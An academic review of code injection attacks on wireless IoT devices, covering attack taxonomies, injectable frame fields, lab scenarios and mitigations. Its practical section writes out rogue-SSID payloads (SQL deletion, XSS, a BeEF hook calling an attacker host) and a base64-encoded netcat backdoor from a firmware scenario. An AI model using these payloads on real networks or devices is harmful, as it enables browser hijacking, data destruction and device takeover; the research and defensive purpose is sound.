Code Injection Attacks in Wireless-Based Internet of Things (IoT): A Comprehensive Review and Practical Implementations
Abstract
:1. Introduction
2. Code Injection Attacks
- Data theft: The intruder may steal private info like passwords and financial data from the target system.
- Remote code execution: The attacker can execute malicious code on the targeted system, which could result in unauthorized access, data theft, or data destruction.
- Privilege escalation: The attacker can gain elevated privileges on the target system, which could result in the attacker gaining full control over the system.
- Network compromise: The attacker can spread the injected code to other systems on the network, leading to a large-scale network compromise.
- Malware deployment: The attacker can install malware on the target system, which could be used to carry out further attacks or monitor the target system.
- Unauthorized access: The attacker can infiltrate the target system without appropriate authentication, which could result in the unauthorized use of sensitive data or resources.
- Service disruptions: The attacker can cause service disruptions on the target system, which could result in downtime and a loss of productivity.
- Financial loss: The attacker can steal financial information and carry out fraudulent activities, which could result in financial loss for the target system and its users.
2.1. Directory Traversal
- Basic directory traversal: This type of attack involves using a relative path to access files or directories outside the intended scope of the application. The attacker may use “../” to move up a level in the directory hierarchy and access files that should be restricted [43].
- Uniform Resource Locator (URL) encoding: Attackers may use URL encoding to evade Web Application Firewall (WAF) and manipulate the file path. URL encoding involves replacing special characters with their corresponding hexadecimal value, such as “%2e%2e/” instead of “../” [44].
- Null byte injection: In this attack, attackers add a null byte (%00) to the file path to trick the application into treating the file path as a null-terminated string. This allows the attacker to bypass filters and access restricted files [45].
- Absolute path traversal: This type of attack involves using an absolute path to access files or directories outside the intended scope of the application. The attacker may use a full file path to access restricted files, such as “C:\restricted\file.txt” in a Windows environment [46].
- Operating system commands: Attackers may execute operating system commands on the target device. This can be accomplished by including operating system commands in the file path, such as “../”;ls -la”, which would list the contents of the parent directory on a Linux-based operating system. This attack can also be categorized under command injection attacks [47].
2.2. HTML5 Injection Attacks
- Content injection: This involves an attacker injecting harmful code into editable areas of a web page, such as comment sections or contact forms [49].
- Script injection involves an attacker injecting malicious code into inline scripts on a web page, such as “onclick” events or script tags [27].
- Attribute injection: This involves an attacker injecting malicious code into attributes of HTML elements, such as the “href” attribute of a hyperlink [50].
- Template injection: This involves an attacker injecting malicious code into HTML templates, which are used to generate web pages dynamically [51].
- SVG injection involves an attacker injecting malicious code into SVG images, which can be leveraged to evade content security policies and execute harmful code in the victim’s browser [52].
- Cascading Style Sheets (CSS) injection involves an attacker injecting malicious code into CSS on a web page, which enables altering the page’s appearance or executing harmful code [53].
2.3. XML Injection Attacks
- XPath injection: XPath is a query language used to navigate and select elements within an XML document. An attacker can inject malicious code into an XPath query in an XPath injection attack. There are two forms of this attack: Error-Based XPath Injection and Blind XPath Injection. In the former, an attacker tries to cause the application to generate an error message by injecting an invalid XPath expression. The error message generated by the application can subsequently be utilized to obtain sensitive details about the primary infrastructure, such as the software version in use or the device’s operating system. In the latter situation, an attacker introduces an XPath expression, resulting in a distinct response from the application. The attacker can then use this response to conclude whether a certain condition is true or false, such as the existence of a particular user account or database table [55].
- XML entity expansion: XML entities are placeholders used to represent data in an XML document. In an entity expansion attack, an attacker can inject many entities into an XML document, which can cause the application to consume excessive resources or even crash [56].
- XML external entity (XXE) injection: In this type of attack, an attacker includes external entities in an XML document to perform further attacks. This enables the intruder to access files on the device’s file system and interact with any backend or external systems the application can connect with [55].
- Extensible Stylesheet Language Transformations (XSLT) injection: The XSLT language transforms XML data into alternative formats. In an XSLT injection attack, an attacker can inject malicious code into an XSLT stylesheet, allowing them to alter or delete data or execute arbitrary code [57].
2.4. SQL Injection Attacks
- 1.
- In-band SQL Injection
- Union-based SQL injection: The attacker injects a UNION clause into a query to combine the results of multiple SELECT statements and gain access to sensitive data [59].
- Error-based SQL injection: The attacker sends malformed SQL statements to the web application, causing the database to return error messages that reveal information about the underlying database structure. Typically, the shown errors play a feedback role to the perpetrator to tinker with the injected SQL query for a successful attack [60].
- 2.
- Inferential SQL Injection
- Boolean: In this type of attack, a SQL query is sent to the database, causing the application to provide a result. This result will vary depending on whether the query is true or false. As a result, the information within the Hypertext Transfer Protocol (HTTP) response may change or remain the same. Based on these changes, the attacker can determine if the message produced a true or false outcome [59].
- Time-based: In this kind of attack, a SQL query is submitted to the database, causing it to pause for a specific number of seconds before responding. The attacker can then determine whether a query is true or false based on the database’s response time. Depending on the outcome, an HTTP response will be created immediately or following a delay. This allows the attacker to determine if their message returned a true or false result without needing data directly from the database [59,60].
- 3.
- Out-of-band SQLi
2.5. Command Injection Attacks
- PowerShell injection: This attack involves injecting malicious commands into PowerShell, a powerful scripting platform and command line interface in the Microsoft Windows operating system. Additionally, this attack can be executed on Linux-based operating systems that have PowerShell enabled [26,61].
- Command prompt injection: This attack involves injecting malicious commands into Microsoft Windows Command Prompt, a console application that can be used to execute various system tasks [26].
- Shell injection: An attacker injects harmful code into the shells of the Unix-like operating systems, permitting them to carry out a wide range of commands on the system [62].
- Script injection: This type of attack involves injecting malicious code into a script executed by the operating system. For example, some operating systems and firmware in embedded systems load a specific script during the booting process. An attacker could inject some lines of malicious code into that script to change or disrupt a certain functionality in the target device [62].
- Remote command injection: This type of attack involves injecting malicious commands into a remote system, such as a lightweight webserver hosted on an IoT device, through a vulnerability in the network or the application [26].
- Dynamic Link Library (DLL) injection: This type of attack involves injecting malicious code into a DLL file, which can then get executed by the Microsoft Windows operating system. DLL injection can take many forms, such as remote DLL injection, load-order hijacking, DLL search order hijacking, side-loading, and reflective DLL injection [63].
- Cron injection: This attack involves modifying existing Cron jobs to execute their commands. Cron is a time-oriented task scheduler within Unix-like operating systems, enabling users to plan and automate tasks, known as Cron jobs, to execute at designated intervals [65].
- Process injection: They are an attack involving running malicious code within the address space of a legitimate process. This can be attained by several methods, including remote thread injection, AtomBombing, process hollowing, process doppelgänging, thread execution hijacking, and code reuse attacks [66].
- Environment variable injection attacks: A perpetrator can insert malicious code into environment variables that applications or system processes utilise. When these applications or processes run, the malicious code gets executed. This form of attack poses a significant threat, as it allows the attacker to maintain persistence even in the event of a system restart or reboot since the malicious code remains embedded within the environment variables [26].
- Registry injection attacks: They target the Windows registry, a database of settings and configuration information for the operating system and installed software. Attackers can inject malicious code into the registry to run automatically when the system starts, execute code with elevated privileges, or persist even after a reboot. The types of registry injection attacks include Autostart Extensibility Point (ASEP) injection, application startup injection, and run key injection. This type of attack is as dangerous as the environment variable injection attacks in maintaining persistence [65].
- Lightweight Directory Access Protocol (LDAP) injections: These attacks occur when an attacker injects malicious LDAP commands into an application’s input fields or other user input mechanisms that rely on LDAP queries. This can allow an attacker to manipulate the LDAP query to execute arbitrary commands on the LDAP server hosted on an IoT device. Different LDAP injection attacks include authentication bypass, resource disclosure, and blind attack [26,67].
- Java Logging Framework Injection (Log4j): The Log4Shell vulnerability, also called Log4j, is a significant security flaw identified in December 2021. This issue impacts the widely-used Apache Log4j2 library, a Java-based logging tool. Cybercriminals can exploit this weakness by sending maliciously crafted references known as Java Naming and Directory Interface (JNDI) to a system using a vulnerable version of Log4j2. When the library processes the input, it can lead to remote code execution, enabling the attacker to gain unauthorized access. Minecraft game servers running on version 1.18 and earlier versions were vulnerable to this attack due to their use of the Apache Log4j2 library for logging [68]. Attackers could exploit the flaw by crafting and sending malicious JNDI references via in-game chat messages. Once processed by the vulnerable library, the injected code would be executed on the server [68,69].
2.6. Cross-Site Scripting (XSS)
- Reflected XSS: This security threat arises when an individual can embed maliciously crafted code into a webpage, which is displayed on a user’s browser and runs within the site’s environment. This vulnerability stems from the web application’s inability to adequately authenticate user input, enabling malicious actors to incorporate malicious code into the application’s response. To execute this attack, the perpetrator typically lures the victim into clicking on a deceptively designed link or submitting a specially crafted form that contains the malicious code. Upon interaction with the susceptible web application, the malicious code is sent back to the user’s browser and executed, providing the attacker with the means to launch further attacks [70,71].
- Stored XSS: An attacker injects and stores malicious code in a web application’s database or other storage media. The malicious code is then served to all users who access the affected page, potentially compromising their security and allowing the attacker to perform various malicious actions [70,71].
- Document Object Model (DOM)-based XSS: This type of web application vulnerability occurs when an adversary can inject malicious code into a web page’s DOM and subsequently execute that code in the context of the victim’s browser. DOM-based XSS attacks are typically carried out by manipulating the URL parameters, form input fields, or other parts of a web page that are used to generate content dynamically within the DOM. Unlike reflected and stored XSS attacks, where the vulnerability is caused by improper server-side input validation, DOM XSS vulnerabilities are caused by client-side script execution. This would complicate the detection and prevention of such attacks, as conventional server-side input validation methods might prove insufficient to address these threats [70,71].
2.7. Cross-Site Request Forgery (CSRF)
- GET-based CSRF: This type of attack occurs when an attacker lures a victim into clicking on a link that contains a malicious request in the URL. The request is then executed when the victim clicks on the link, and their browser sends it to the vulnerable application. Because the request is executed using the victim’s authentication credentials, the vulnerable application cannot distinguish between a legitimate and a malicious request [73,74].
- POST-based CSRF: This type of attack is similar to GET-based CSRF, but it relies on the victim submitting a form that contains a malicious request. The attacker may trick the victim into submitting the form using social engineering tactics, such as disguising the form as a legitimate login or registration form [73,74].
2.8. Buffer Overflow
- Stack-based buffer overflow: This involves overwriting the memory of a program’s stack, which stores local variables and function calls, to execute arbitrary code or modify the program’s control flow [76].
- Heap-based buffer overflow: This involves overwriting the memory of a program’s heap, which is used to allocate memory dynamically and execute arbitrary code or modify the program’s behavior [77].
- Integer overflow: This attack occurs when a mathematical operation produces a value that is too large or too small to represent the designated data type accurately. It typically occurs when an operation’s result surpasses the maximum or minimum value capable of being represented by the data type, which in turn causes the value to “wrap around” and revert to a lower or higher value [78].
- Jump-Oriented Programming (JOP): This involves using existing code snippets in a program to execute arbitrary code by jumping to different memory locations without injecting a new code [81].
- Global Offset Table (GOT) buffer overflow: This type of buffer overflow attack targets the GOT data structure in a program’s memory. It is worth mentioning that the GOT is normally used by programs to store addresses of dynamically linked functions and variables. By corrupting the GOT, an attacker can redirect the program’s execution flow to their malicious code [82].
- Unicode overflow: This attack exploits a vulnerability that arises from improper handling of Unicode encoded data. Like other buffer overflow types, this attack is performed by sending malicious Unicode input that exceeds the buffer size, which will cause memory corruption and potentially execute malicious code [83].
- Return-to-libc: This attack is designed and performed to bypass security measures like a non-executable stack. Instead of injecting and executing malicious code directly into the stack, the attacker overwrites the return address with the address of a desired function already existing in a standard C library like printf or scanf, amongst others [79,80].
2.9. Format String Attacks
- Information disclosure attacks exploit format string vulnerabilities to extract sensitive information from a program’s memory. By inserting specific format string conversion specifiers, attackers can extract data from memory addresses adjacent to the memory address holding the intended input. This can reveal system configurations, passwords, or user data [84,85,86].
- Denial of Service attacks: These attacks occur when an attacker sends input containing format string conversion specifiers that cause the program to crash or halt. This can be done using the %n specifier to write data to an invalid memory location, causing the program to fail [86].
- Arbitrary code execution attacks: Attackers leverage format string vulnerabilities to execute arbitrary code on a vulnerable system. Using format string conversion specifiers to write specific values to a target address, attackers can execute code loaded into that address, effectively taking control of the system. This type is considered the most severe and dangerous form of format string attacks [84,85,86].
2.10. Object Injection Attacks
- Expression Language (EL) injection: This type occurs when an attacker injects arbitrary code or expressions into an application’s data processing expressions. This vulnerability typically affects web applications using expression languages like JavaServer Pages (JSP) Expression Language or AngularJS expressions, amongst others [88].
2.11. Firmware Code Injection Attacks
- Supply chain attacks: Compromising the firmware at the manufacturing stage, before the device reaches the end user, is another way for attackers to inject malicious code. This is particularly concerning, as it is difficult to detect and can affect many devices simultaneously [94].
- Downloading firmware from the manufacturer’s website: Attackers can also compromise the firmware by tampering with the files available for download on the manufacturer’s website. After downloading the firmware, the attacker might reverse engineer the firmware and injects a malicious code inside it before flashing the updated malicious version back to the device [94].
2.12. Log Poisoning Attacks
- Web server logs: Web server logs record information about client requests, server responses, and errors that may occur while processing requests. The attacker can inject malicious code in HTTP requests or manipulate URL parameters with code. Examples include Apache access, Nginx access, and IIS logs [95,96,97].
- Application logs: These logs are generated by web applications, mobile apps, or desktop software. The attack happens when an attacker injects malicious code into user input fields, manipulating log entries generated by the application [95].
- System logs: These types of logs provide information about the events occurring within an operating system, its services, and its components. Examples include Linux Syslog and Windows Event Logs [97].
- Authentication logs: Authentication logs track user authentication events, such as successful logins, failed login attempts, and account lockouts. The attack involves injecting malicious code in usernames or password fields. Examples include SSH logs in Linux-based operating systems and Windows Event Logs for logon events [96].
- Mail server logs: Mail server logs store information about email transactions, including sent and received messages, errors, and other relevant events. The attack occurs when the attacker injects malicious code into email headers or bodies. Examples include logs from Postfix, Sendmail, and Exim mail transfer agents [98].
- Database logs: These logs record events related to database operations, such as executed queries, data modifications, and errors. An attacker can inject malicious SQL code in queries, exploiting vulnerabilities in log parsing tools or log management systems. Examples include logs from MySQL, PostgreSQL, Oracle, and SQL Server [95,99].
2.13. Hibernate Query Language Injection Attacks
2.14. Indirect Prompt Injection Attacks
3. Technology-Specific Wireless Frames’ Fields Vulnerable to Code Injection Attacks
- 1.
- Header fields/payloads with character strings format
- 2.
- Header fields/payloads with Hexadecimal format
3.1. Wi-Fi Technology (IEEE802.11 Standard)
- Service Set Identifier (SSID)
- Basic Service Set Identifier (BSSID)
3.2. Bluetooth Technology
- Device Name
3.3. Low-Rate Wireless Networks (IEEE802.15.4 Standard)
- Personal Area Network Identifier (PAN ID)
3.4. Zigbee Technology
- Personal Area Network Identifier (PAN ID)
- Extended Personal Area Network Identifier (EPID)
- UserDescriptor
3.5. Thread Technology
- Personal Area Network Identifier (PAN ID)
- Extended Personal Area Network Identifier (XPANID)
- Network Name
3.6. Low Range Wide Area Network (LoRaWAN)
- DevEUI
- JoinEUI
- Home_NetID
3.7. Z-Wave Technology
- HomeID
3.8. Body Area Networks (IEEE 802.15.6)
- BAN ID
- Sender Address field of the beacon frame
3.9. Short-Range Optical Wireless Communications (IEEE 802.15.7)
- Optical Wireless Personal Area Network Identifier (OWPAN ID)
3.10. WirelessHART
- Gateway HART tag
3.11. Radio Frequency Identification (RFID)
- Payload
3.12. Near Field Communication (NFC)
- Payload Type field
- Payload
3.13. Other Wireless Technologies
4. Code Injection Attack Framework in The Wireless Domain
4.1. Code Injection Attacks through the Wi-Fi SSID
Pseudocode 1: Pseudocode of the vulnerable scanner and the attack process |
//Starting the vulnerable scanner on the victim machine |
Start |
Launch web_browser |
//In the scanning loop |
Loop |
Scan Wi-Fi_networks |
If attacker_network_scanned |
//Display results and execute code |
Display Results (attacker_network & other_networks) |
Execute Code |
Else |
Display Results (other_networks) |
Endif |
//Check if the scanner is running |
If victim_stopped_the_scanner |
Break |
Endif |
Endloop |
End |
4.1.1. Scenario 1—HTML Code Injection
sudo airbase-ng --essid “<h1>HACKED</h1>” -c 3 wlan0mon |
- The parameter “ESSID” stands for “Extended Service Set Identifier.” However, the terms “ESSID” and “SSID” are often used interchangeably to refer to the unique identifier for a Wi-Fi network. When using Airodump-ng [141], the “ESSID” field displays the names of detected Wi-Fi networks. In this particular scenario, the “ESSID” represents the name of the attacker network, which happens to be an HTML code.
- The parameter “c” represents the channel number.
- The parameter “wlan0mon” represents the Wi-fi interface.
4.1.2. Scenario 2—CSRF Code Injection
Sudo python -m SimpleHTTPServer 80 |
sudo airbase-ng --essid ‘<img src= http://192.168.1.14/icon >’ -c 8 wlan0mon |
4.1.3. Scenario 3—SQL Injection
sudo airbase-ng --essid ‘”); delete from ap; --’ -c 3 wlan0mon |
4.1.4. Scenario 4—XSS—DoS Attack
sudo airbase-ng --essid “<script>alert(1)</script>” -c 6 wlan0mon |
4.1.5. Scenario 5—XSS—Browser Exploitation Framework
- 1.
- Victim Hooking
<script src=http://Attacker_IP_ADDRESS:3000/hook.js></script> |
HTML Code 1: Injecting BeEF hook script in HTML |
<HTML> |
<head> |
<title> BeEF Hacking</title> |
<script src=”http://Attacker_IP_ADDRESS:3000/hook.js”></script> |
</head> |
<body> <h1> YOU HAVE BEEN HACKED!!!</h1> </body> |
</HTML> |
sudo airbase-ng --essid “<script src=”http://Attacker_IP_ADDRESS:3000/hook.js”></script>” -c 7 wlan0mon |
http://bit.ly/3kQC |
sudo airbase-ng --essid “<script src=” http://bit.ly/3kQC”></script>” -c 7 wlan0mon |
<a href=‘http://bit.ly/3kQC’></a> |
sudo airbase-ng –essid “<a href=‘bit.ly/3kQC’>a</a>”-c 4 wlan0mon |
- 2.
- Attacks Execution
- Command module: This allows the attacker to execute arbitrary commands on the victim’s device. This can include anything from running a simple command prompt to installing malware or modifying system settings.
- Browser details module: This allows the attacker to gather information about the victim’s browser, including the version, plugins, and user agent. This information can be used to identify vulnerabilities that can be exploited.
- Network module: This allows the attacker to gather information about the victim’s network, including the IP address, DNS servers, and default gateway. This information can be used to locate the victim’s device on the network and potentially gain access to other devices on the same network.
- Hook module: This module allows the attacker to maintain control over the victim’s browser even after the victim has navigated to a different website. This allows the attacker to continue to exploit the victim’s browser even if the victim tries to leave the original compromised website.
- Exploits module: This module contains several pre-built exploit modules that can be used to exploit vulnerabilities in the victim’s browser. These exploits can be used to gain unauthorized access to the victim’s device or to steal sensitive information.
- Social engineering module: This module allows the attacker to use social engineering techniques, such as phishing, to trick the victim into revealing confidential information or taking actions that compromise their device.
- Recon module: This allows the attacker to gather information about the victim’s device and network, including the operating system, browser, and installed applications.
4.2. Code Injection Attacks Detection on Exploited Firmware
4.2.1. Scenario 1—Firmware Backdoor Injection
Sudo Binwalk -e firmware.bin |
echo “bmMgLWwgNDc2Mw==” | base64 -d |
4.2.2. Scenario 2—Firmware Command Injection
4.2.3. Scenario 3—Firmware Script Injection
grep -ir telnet | head -n 10 |
cat etc/config/image_sign |
4.3. Criticality Analysis
- Occurrence Probability refers to the likelihood of the occurrence of the attack in IoT environments. It classifies this probability into low, medium, or high categories, depending on the frequency and conducive conditions of each attack type. A low probability may represent rare attacks that require specific conditions, whereas a high probability suggests common attacks occurring under general conditions. Medium probability signifies an intermediate frequency of occurrence based on historical data and inherent characteristics of each implemented code injection attack type.
- Severity refers to the potential impact of an attack. High-severity attacks can cause significant damage to IoT systems and devices, such as data theft, device disruption, or physical damage.
- Difficulty refers to the skill, tools, or specific conditions necessary for an attacker to exploit a vulnerability or execute an attack successfully. This difficulty could be low, indicating that less-skilled attackers with basic tools or resources could execute the attack. The medium difficulty suggests a need for an intermediate level of expertise or more specific resources but not necessarily requiring advanced knowledge or complex strategies. The high-difficulty attacks often demand advanced skills, sophisticated tools, or complex multistep processes.
- Intrusion Effects refer to the specific effects that can occur due to a code injection attack. These effects can vary depending on the attack type, the vulnerability exploited, and the device’s configuration.
- Pivoting Ability refers to the capability of an attacker, having gained initial access to a system, to move laterally within a network. An attacker with a low-pivoting ability may be less likely to penetrate further into the network. This could be due to the vulnerability itself, which, even when exploited, does not provide substantial opportunity for lateral movement. Similarly, a medium-pivoting ability presents reasonable possibilities for network traversal. However, this is conditional not only upon the vulnerability being of a type that allows for pivoting but also requires the attacker to possess a certain skill level to effectively exploit this vulnerability for lateral movement within the network. A high-pivoting ability indicates that the exploited vulnerability inherently enables a facile lateral movement within a network’s infrastructure. This ease of pivoting occurs due to the essential properties of the exploited vulnerability, which may allow for more efficient traversal between network devices.
4.3.1. HTML Code Injection
- Intrusion Mode Identification: The first type of attack considered in our analysis is HTML5 code injection. This refers to the insertion of malicious HTML5 code into the IoT device’s input fields, which, when executed, can lead to various effects.
- Intrusion Effects Analysis: The effects of HTML5 code injection attacks could be relatively benign, such as displaying an innocuous message on the device’s interface.
- Occurrence Probability: The probability of occurrence for HTML5 code injection is high. This type of attack does not require a high level of expertise and can be executed under general conditions.
- Severity: HTML5 code injection carries low severity. While the effects of the attack might be bothersome, it does not typically lead to significant damages like data theft or physical disruption of the device.
- Difficulty: Conducting an HTML5 code injection is low, making it feasible for attackers with basic tools and resources.
- Pivoting Ability: The ability to pivot, or move laterally within the network after an HTML5 code injection attack, is low. This is due to the nature of the vulnerability, which does not typically grant substantial access or control over the device or network.
- Mitigation Strategies: Mitigation strategies for HTML5 code injection include implementing input validation and sanitization techniques, which can prevent attackers from successfully injecting malicious code into the device’s input fields.
4.3.2. CSRF Code Injection
- Intrusion Mode Identification: The second attack scenario we consider in our analysis is CSRF code injection. In this attack, the adversary tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on its behalf.
- Intrusion Effects Analysis: The consequences of successful CSRF code injection attacks can be significantly damaging, particularly in the context of IoT devices. With these attacks, malicious CSRF code can be executed on the device, leading the device to perform actions that the user did not intend. This can disrupt the device’s normal operation and compromise user data or functionality.
- Occurrence Probability: The occurrence probability for CSRF code injection attacks is medium. These attacks can occur under certain conditions. For instance, the attacker might need to host a malicious server and register a domain.
- Severity: The potential consequence of a CSRF attack is relatively medium in the implemented scenario, as the CSRF vulnerability has been exploited to display an unwanted icon on the user interface. This does not directly affect user data’s integrity, availability, or confidentiality.
- Difficulty: Executing CSRF code injection attacks is medium, indicating that some expertise and specific resources are necessary for successful exploitation.
- Pivoting Ability: The pivoting ability following a CSRF code injection is considered medium. Upon successful exploitation, the attacker may gain some capabilities for lateral movement within the network. However, this depends on both the nature of the exploited vulnerability and the attacker’s skill level.
- Mitigation Strategies: Implementing input validation and sanitization techniques can mitigate CSRF code injection attacks. These techniques prevent attackers from injecting malicious code into the IoT device’s inputs. Other measures, such as using anti-CSRF tokens and SameSite cookies, and applying the principle of least privilege, can also significantly improve resilience against CSRF attacks.
4.3.3. SQL Injection
- Intrusion Mode Identification: SQL injection is the third attack scenario considered in our analysis. This attack involves the injection of malicious SQL queries into the application’s database query. By successfully executing such attacks, adversaries can manipulate the application’s database, leading to severe consequences.
- Intrusion Effects Analysis: Successful SQL injection attacks can devastate IoT devices. Malicious SQL code can be executed on the device, leading to actions such as data theft or manipulation. This could compromise the confidentiality, integrity, and availability of user data stored in the database.
- Occurrence Probability: The probability of SQL injection attacks is high. These types of attacks are common and can occur under many circumstances. For instance, the attacker does not need to host a server to launch the attacks from it.
- Severity: SQL injection attacks carry a high severity due to the potential for significant damage to IoT systems. This includes threats such as unauthorized access to sensitive data, alteration of the database’s information, and in extreme cases, control over the IoT system’s backend database.
- Difficulty: The difficulty of conducting an SQL injection attack is medium. While this type of attack does require some level of expertise and specific knowledge of SQL syntax, numerous tools available on the internet can automate much of the process, lowering the skill barrier.
- Pivoting Ability: Pivoting ability in the case of SQL injection is considered medium. Depending on the specific system configuration and the data an attacker can access, it might be possible to use an SQL injection vulnerability as a stepping stone for further attacks on the network. For instance, if the database of the vulnerable device is running as a high-privilege user, the attacker might be able to run remote code execution on the device, followed by pivoting.
- Mitigation Strategies: Mitigation strategies for SQL injection attacks revolve around robust input validation and sanitization, parameterized queries or prepared statements, web application firewalls, and regular code reviews that can prevent attackers from successfully injecting malicious SQL queries. Additionally, applying the principle of least privilege to database accounts can limit the potential damage of an SQL injection attack.
4.3.4. XSS—DoS Attack
- Intrusion Mode Identification: The fourth attack scenario considered in our analysis is XSS—DoS attack. This attack involves an adversary injecting malicious scripts into a web page viewed by users. The executed script can perform undesired actions on the user’s behalf and, in this particular scenario, can lead to a DoS attack
- Intrusion Effects Analysis: A successful XSS DoS attack can severely impact IoT devices. Malicious XSS code, when executed on the device, can steal the user’s cookies or other sensitive information, or lead to denial-of-service attacks, as we demonstrate in the implemented scenario.
- Occurrence Probability: The occurrence probability for XSS DoS attacks is high. These attacks are fairly common due to the availability of the attack’s payloads all over the internet. Those payloads can be used directly by experts and non-experts attackers.
- Severity: The potential impact of XSS DoS attacks in the implemented scenario is of medium severity. While these attacks may disrupt the operation of IoT devices, they do not compromise the confidentiality or integrity of the targeted device.
- Difficulty: The difficulty of conducting an XSS DoS attack is low. This suggests that even less-skilled attackers, with basic tools or resources, could execute the attack. Additionally, many online platforms provide ready-to-use XSS payloads, lowering the knowledge barrier required for these attacks.
- Pivoting Ability: The pivoting ability following a successful XSS DoS attack is considered medium. After an initial compromise, the attacker might gain some capabilities for lateral movement within the network, depending on the nature of the exploited vulnerability and the attacker’s skill level. However, pivoting can be accomplished only in the case of stored XSS.
- Mitigation Strategies: To mitigate XSS DoS attacks, implementing input validation and sanitization techniques is key. These techniques can prevent malicious script injection into the IoT device’s inputs. Other preventive measures such as content security policy (CSP), output encoding, and utilizing HTTPOnly cookies can also strengthen the device’s resilience against these attacks.
4.3.5. XSS—BeEF
- Intrusion Mode Identification: The fifth attack scenario considered in our analysis is XSS via a BeEF. This kind of attack involves an adversary using an exploitation framework to automate the creation and delivery of malicious scripts in a web page viewed by IoT users.
- Intrusion Effects Analysis: A successful XSS attack via a BeEF can significantly impact IoT devices. Once the malicious XSS code is executed on the device, the attacker can steal the user’s cookies or other sensitive information and potentially expose the system to further attack vectors by redirecting the exploited device to the attacker’s server.
- Occurrence Probability: The occurrence probability for XSS attacks via BeEF is medium. In contrast, they are not as common as basic XSS attacks due to the intricate setup of some specialized tools like BeEF.
- Severity: XSS attacks using a BeEF carry a high severity. The potential damage includes unauthorized access to sensitive user data, disruption of device functionality, and a potential foothold for additional attack vectors on IoT devices.
- Difficulty: The difficulty of conducting an XSS attack using a BeEF is considered medium. It requires some understanding of XSS attacks and knowledge of exploiting frameworks but does not necessarily require advanced coding skills.
- Pivoting Ability: In the case of XSS via a BeEF, pivoting ability is high. Once the attacker gains an initial foothold via the XSS vulnerability, the BeEF can facilitate further intrusion into the network or other connected devices.
- Mitigation Strategies: To mitigate XSS attacks via BeEF, input validation and sanitization techniques should be applied. Secure coding practices such as implementing CSP, output encoding, and HTTPOnly cookies are also recommended.
4.3.6. Firmware Backdoor Injection
- Intrusion Mode Identification: The sixth scenario considered in our analysis is Firmware Backdoor Injection. This attack involves an adversary injecting malicious code into a device’s firmware. Once the malicious code is injected and the device’s firmware is updated, the attacker can gain complete control of the device.
- Intrusion Effects Analysis: A successful Firmware Backdoor Injection attack can seriously impact IoT devices. Once injected into the device’s firmware, malicious code can give the attacker full control of the device, which can lead to a range of subsequent attacks, including data theft, denial of service, or even physical damage that might brick the device.
- Occurrence Probability: The occurrence probability for Firmware Backdoor Injection attacks is low. These attacks require specific conditions to be successful, such as a lack of firmware signing or encryption and the complex procedure of extracting the firmware from the device. This makes them less common than other types of attacks.
- Severity: The severity of Firmware Backdoor Injection attacks is high. These attacks can lead to complete device compromise, potentially impacting the IoT system’s reliability, integrity, and confidentiality.
- Difficulty: The difficulty of conducting a Firmware Backdoor Injection attack is high. It often demands advanced skills, sophisticated tools, or complex multistep processes, making it challenging for less skilled attackers to perform successfully.
- Pivoting Ability: The pivoting ability following a successful Firmware Backdoor Injection attack is high. With full control of the device, the attacker can easily move laterally within a network, potentially compromising other devices and systems.
- Mitigation Strategies: To mitigate Firmware Backdoor Injection attacks, it is essential to implement robust validation processes for firmware updates. These could include using digital signatures to verify the source and integrity of the firmware and cryptographic hashes to ensure the firmware has not been altered to protect the firmware from unauthorized access during transmission. Other preventive measures, such as the least privilege principle and secure boot mechanisms, can further harden the device against these attacks.
4.3.7. Firmware Command Injection
- Intrusion Mode Identification: The seventh attack considered in our analysis is Firmware Command Injection. This attack involves an adversary injecting malicious commands into a device’s firmware, allowing the attacker to execute arbitrary commands once the firmware is updated.
- Intrusion Effects Analysis: A successful Firmware Command Injection attack can lead to severe consequences. The ability to execute arbitrary commands can give the attacker significant control over the IoT device, enabling actions such as data theft, modification of device settings, or initiating further attacks.
- Occurrence Probability: The occurrence probability for Firmware Command Injection attacks is medium. They occur more frequently in environments where firmware updates lack proper validation and security checks.
- Severity: Firmware Command Injection attacks carry a high severity. Successful attacks can provide significant control over an IoT device, compromising its integrity, confidentiality, and availability.
- Difficulty: The difficulty of conducting a Firmware Command Injection attack is high. It usually requires a good understanding of the device firmware, command syntax, and potential vulnerabilities.
- Pivoting Ability: The pivoting ability in the case of Firmware Command Injection attacks is high. Once arbitrary commands can be executed on the device, the attacker can use the compromised device as a launchpad for further network intrusions.
- Mitigation Strategies: To mitigate Firmware Command Injection attacks, implementing data sanitization techniques is essential to ensure that injected commands cannot be executed. Moreover, robust validation processes for firmware updates should be implemented. This could involve using digital signatures to verify the source and integrity of the firmware and cryptographic hashes to ensure that the firmware has not been modified.
4.3.8. Firmware Script Injection
- Intrusion Mode Identification: The eighth attack considered in our analysis is Firmware Script Injection. This attack involves the insertion of malicious scripts into a device’s firmware, allowing the attacker to execute malicious code on the device once the firmware is updated.
- Intrusion Effects Analysis: The impact of a successful Firmware Script Injection attack can be severe. The injection of malicious scripts into the device’s firmware allows the attacker to execute arbitrary commands, potentially leading to data theft, device manipulation, or even the initiation of further attacks.
- Occurrence Probability: The occurrence probability of Firmware Script Injection attacks is low. They typically require specific conditions, such as a lack of input sanitization or validation during the firmware update process.
- Severity: Firmware Script Injection attacks have a high severity. Successful attacks can compromise the device’s confidentiality, integrity, and availability.
- Difficulty: The difficulty level of executing a Firmware Script Injection attack is high. It often requires advanced technical skills, knowledge about the device’s firmware and potential vulnerabilities, and sophisticated tools.
- Pivoting Ability: The pivoting ability in the context of Firmware Script Injection attacks is high. If an attacker can execute arbitrary commands on a device, it can potentially be used as a launchpad for further network intrusions.
- Mitigation Strategies: To mitigate the risks associated with Firmware Script Injection attacks, it is essential to implement robust validation processes for firmware updates. These processes might include using digital signatures and cryptographic hashes to verify the integrity and source of the firmware. Additionally, employing input sanitization techniques can prevent the execution of injected scripts.
5. Analysis of Recent Code Injection Vulnerabilities in IoT Devices
6. Discussion and Conclusions
- Regularly update firmware and software: Ensure all devices run the latest firmware and software versions, typically including security patches and improvements to defend against known vulnerabilities.
- Validate and sanitize input data: Implement strict input validation and data sanitization techniques to prevent malicious code from being injected into IoT devices through user input or data streams.
- Firmware validation: Implement robust validation processes for firmware updates, including using digital signatures and cryptographic hashes to ensure the integrity and authenticity of firmware files. This helps prevent tampering and the installation of unauthorized or malicious firmware updates on IoT devices. By verifying the source and contents of firmware updates, users and manufacturers can reduce the risk of code injection attacks resulting from compromised firmware.
- Least privilege principle: Limit the permissions and capabilities of IoT devices to only what is necessary for their intended function, reducing the potential attack surface for code injection exploits.
- Monitor and log device activity: Regularly review logs and activity reports to detect suspicious behavior, potential code injection attempts, or security incidents.
